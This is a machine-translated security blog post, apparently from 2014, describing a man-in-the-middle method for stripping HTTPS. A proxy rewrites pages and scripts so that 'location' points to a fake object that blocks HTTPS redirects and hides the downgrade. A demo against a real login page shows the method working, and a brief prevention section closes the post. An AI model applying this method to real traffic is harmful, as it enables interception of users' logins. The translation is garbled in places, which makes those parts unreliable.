EtherDream 2014/11/11 10:15
0 x00 preface
The HTTPS front-end hijacking scheme introduced earlier is interesting, but the reality is not ideal. Its only, and biggest, drawback is its inability to prevent script jumps. If it didn’t, it would be perfect — and there would be no need to write this article.
At the end of the day, it’s because you can’t override the Location object — it’s the only way the script can jump. There are hacks out there that can be implemented reluctantly, but they are unreliable.
In fact, in the recent HTML5 standard, location has been very clear – Unforgeable.
This is sad news. But it is also a good thing, let us completely eliminate all kinds of evil ideas, looking for a new way out.
0x01 Replaces the plaintext URL
As MENTIONED last time, you can use SSLStrip to replace all HTTPS urls in scripts with HTTP versions for some scenarios.
Of course, there are obvious drawbacks. As long as the URL does not appear in clear text — for example, by concatenating strings — it is completely unrecognizable and ultimately impossible to avoid redirecting to an HTTPS page.
This is not uncommon, so we need more advanced solutions.
0 x02 replace the location
Even though we can’t rewrite location, it’s pretty easy to copy something that does what location does. We only need to define a few getters and setters to simulate an identical location2. But how do we map the original location?
This is where the back end comes in. Similar to replacing the HTTPS URL, this time we’ll just focus on the location character in the script and change it all to location2 — so all reads and writes related to the address bar will fall on our agent. I don’t need to tell you what you can do after that.
-
Proxy-owned setters: block a jump to HTTPS and demote to the HTTP version.
-
Proxy all getters: if the page is currently degraded, we will return the path to restore HTTPS characters, can fool the protocol judgment script, let those self-checking functionality completely disabled!
This scheme is much better than the previous URL substitution – it is very common for urls to be created dynamically, but it is extremely rare for a location not to appear in clear text.
Even with a compression tool like Uglify, global variables will not be confused unless the script is encrypted. As for the artificial deliberately to escape it, it is nonsense.
#! js if (window['loc\ation'].protocol ! = 'https:') { // ... }Copy the code
At this point, our goals are clear:
-
Front end: Implement a Location agent.
-
Back end: Replace the location in the script with the proxy variable name.
0x03 Processing external chain Script
While it is not difficult to replace the content of the page script, it is not so easy to replace the content of the outer link script.
In reality, many pages are linked to HTTPS absolute path scripts. At this point, our middleman is helpless. To avoid this, we still need to replace the HTTPS URL on the page, giving the middleman more control over the resources.
It’s not hard to replace urls, and a simple re can do it — but with the re, we’re dealing with strings.
In reality, however, all the data received is raw binary data, not even utF-8. In the last article, we went straight to binary injection for simplicity. But that is no longer a viable option today.
Using binary, not only is it hard to control, it’s also very lax. It is difficult to know whether we are matching individual characters or partial bytes of a wide character. Therefore, we have to handle strings in the traditional, reliable way.
0x04 Handles word set encoding
To do this, we have to rely on character conversion libraries, such as the famous Iconv:
-
The binary data is first converted to a UTF-8 string
-
With a standard string, our re can be executed smoothly
-
The processed string is replaced with the previous encoding
This is necessary, even though it takes two trips and a lot of performance.
In fact, the process is not as smooth as expected. Quite a few servers do not specify the encoding word set in the returned Content-Type, so we try to get it from the
of the page.
But this label is compatible with many specifications, such as the past:
#! html <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=GBK">Copy the code
And now popular:
#! html <meta charset="GBK" />Copy the code
Although it’s easy to get by using a re, you still have to have a string in order to use the re, so we’re stuck.
The good news is that tags, attributes, and font names are mostly pure ASCII characters, so you can first convert the binary to the default UTF-8 string, extract the font information from it, and then transcode it.
0x05 Processes data partitioning
Thanks to rich third-party extensions, none of these issues are difficult to solve.
However, one of the big advantages of front-end hijacking mentioned earlier is that instead of processing all the data, you just need to inject code in the first chunk. But that advantage is now being severely tested.
We need to replace HTTPS resources, location variables, and so on in the page, which appear everywhere on the page. Would it be a problem if we filtered and forwarded each chunk individually?
In reality, this is not always ideal — there is always a chance that the replacement keyword will span exactly two chunks:
At this time, incomplete head and tail can not match, so there will be omission. The longer the keyword, the more likely it is to appear. This is a potential hazard for strings as long as urls.
It’s a tricky problem to solve perfectly. However, there is a simple solution: we can keep the characters at the end of the chunk and concatenate them before the next chunk, thus reducing the chance of missing them.
Of course, if the user experience is not considered, or collect all the data, the last one-time processing, the most convenient.
There is actually a better solution: the middleman opens a buffer into which the received data is temporarily cached. Batch processing of the cache queue begins when a certain amount of data has accumulated, or when there has been no data for more than a few days.
This avoids frequent chunk context processing and does not block the user’s response time for long periods of time, which is the best of both worlds.
This smells a bit like TCP Nagle.
0x06 Front-end Location agent
Having covered the details of the back end, let’s move on to the front end.
Implementing a location proxy is simple, but there are a few details worth noting:
-
Location not only exists in the window, but actually document has the same thing.
-
The location object itself can also be assigned, equivalent to location.href. ([PutForwards = href,… Well explained)
-
Similarly, the toString for location returns the href property.
-
If the script with location2 is cached, the user may report an error on a page that has not been hijacked. So we have to have a compatible fallback.
-
.
Implementing a location slice is relatively easy, as long as you think about it.
0x07 Dynamic Script Hijacking
Earlier I talked about replacing the HTTPS URL of the page to ensure the plaintext transfer of the external linked script.
In reality, however, not all scripts are static. In this day and age of scripting, dynamically loading modules is common. If an HTTPS script is introduced, our middleman is out of the question.
Thankfully, module interception is not impossible like location. In reality, there are many ways to intercept dynamic modules. The various methods and details discussed in the previous article “XSS Front-end Firewall — Suspicious Module Interception” come in handy.
In fact, this problem applies to frame pages as well as scripts. In the last article, we used CSP to block HTTPS frame pages. But that’s just blocking, not really blocking. Only with the current hook system is a complete interception system.
0 x08 demo
Having said that, the real core is just changing the location variable in the script, and everything else is just to help it.
Let’s find a few sites that didn’t work before and try out this enhanced hijacking tool.
The last article mentioned jingdong login, is through the script jump. Let’s test it first:
When traffic passes through the man-in-the-middle broker, location in the page and script becomes our variable name. So we’re in control of everything that’s going on with the address bar:
Note that there is a zh_cn mark in the address bar, which is the identification code for the downward transformation of the URL.
Everything you get from Location2 looks exactly like it would on an HTTPS page. Even if scripts have self-checking capabilities, they can be fooled by our virtual environment.
Click login, naturally is successful.
After all, HTTPS and HTTP are just transport differences. At the application level, the page is unknowable — except to ask for the location of the script, which we’ve hijacked.
Fortunately, we have replaced all the HTTPS urls in the page, so we can still jump to the degraded page:
It is worth noting that if you click in from the QQ icon, then the page will go directly to the HTTPS version and will not be hijacked. But coming from a third party is a matter of fate.
Because of normal developer thinking, it is impossible to escape the location variable. So this scheme can kill almost all secure sites.
Of course, foreign websites are the same. As long as it has not been cached by HSTS before, hijacking is still easy.
.
So an engineered universal hijacking scheme is still possible with endless imagination.
0x09 Preventive Measures
If you’ve been reading this carefully, you’ve already figured out what to do about it.
In fact, because JS is so flexible, it’s almost impossible to infer runtime behavior from static source code.
Therefore, by simply escaping and obfuscating operations involving location, you can avoid being hijacked by the middleman. After all, hijacking traffic while parsing scripts at the same time is a bit expensive.